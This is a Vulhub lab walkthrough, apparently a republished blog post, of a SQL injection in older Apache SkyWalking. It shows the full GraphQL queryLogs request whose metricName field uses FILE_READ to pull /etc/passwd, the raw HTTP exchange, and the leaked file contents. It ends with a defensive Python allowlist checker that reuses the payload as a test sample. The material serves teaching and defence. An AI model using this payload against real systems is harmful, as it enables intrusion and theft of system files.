
[vulhub] skywalking

2024/10/25 16:18:02  Source: https://blog.csdn.net/weixin_43372364/article/details/140850412

SkyWalking is an open-source monitoring platform for collecting, analyzing, aggregating and visualizing data from services and cloud-native infrastructure.

Older versions have a SQL injection vulnerability: the metricName field of the queryLogs GraphQL condition is concatenated into the storage query.

Target URL

http://192.168.203.12:8080/graphql

Capture the request with Burp Suite.

Replace the request body with the following:

{"query":"query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}

POST /graphql HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 413
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.203.12:8080
Referer: http://192.168.203.12:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"query":"query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}

Response (the error message echoes both the file contents read by FILE_READ and the full SQL statement the injected metricName ended up in):

HTTP/1.1 200
X-Application-Context: application:8080
Date: Thu, 01 Aug 2024 07:51:24 GMT
Content-Type: application/json;charset=utf-8
Content-Length: 1287

{"data":{},"errors":[{"message":"Exception while fetching data (/queryLogs) : Data conversion error converting \"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\"; SQL statement:\nselect count(1) total from (select 1 from INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1-- where  1=1  and time_bucket >= ? and time_bucket <= ? ) [22018-196]"}]}
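Since the root cause is that metricName is spliced into SQL as-is, the practical defence is to allowlist the field before it reaches the storage layer and to alert on requests that fail the check. The checker below is an added example written for this page, not SkyWalking's own code or the original post's; the allowlist pattern and the sample request bodies are assumptions constructed here (the injection body is the one from the write-up, with the state value quoted so that it parses as JSON).

```python
import json
import re

# Hypothetical allowlist: SkyWalking metric names are plain identifiers, so
# quotes, parentheses, spaces and comment markers have no business in the field.
METRIC_NAME_RE = re.compile(r"^[A-Za-z0-9_.]{1,128}$")


def find_metric_names(node):
    """Recursively yield every 'metricName' string inside the GraphQL variables."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "metricName" and isinstance(value, str):
                yield value
            else:
                yield from find_metric_names(value)
    elif isinstance(node, list):
        for item in node:
            yield from find_metric_names(item)


def check_graphql_body(raw_body: str):
    """Return the metricName values in a JSON GraphQL request that fail the allowlist.

    An empty list means the request is clean; a non-empty list is what a WAF
    rule or a log-based detection would alert on (and what a server-side
    validator would reject before building the query)."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return ["<unparseable body>"]
    variables = body.get("variables", {}) if isinstance(body, dict) else {}
    return [name for name in find_metric_names(variables)
            if not METRIC_NAME_RE.match(name)]


# Constructed sample bodies for a queryLogs request: one benign, one carrying
# the injection shape shown in the write-up.
QUERY = ("query queryLogs($condition: LogQueryCondition) "
         "{ queryLogs(condition: $condition) { logs { content } } }")
BENIGN_BODY = json.dumps({"query": QUERY, "variables": {"condition": {
    "metricName": "service_resp_time", "paging": {"pageNum": 1, "pageSize": 1},
    "state": "ALL"}}})
INJECTED_BODY = json.dumps({"query": QUERY, "variables": {"condition": {
    "metricName": "INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--",
    "paging": {"pageNum": 1, "pageSize": 1}, "state": "ALL"}}})

if __name__ == "__main__":
    print("benign:", check_graphql_body(BENIGN_BODY))
    print("injected:", check_graphql_body(INJECTED_BODY))
```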

References

Apache SkyWalking <= 8.3 SQL injection (vulnerability analysis | Snort rule writing) - CSDN blog
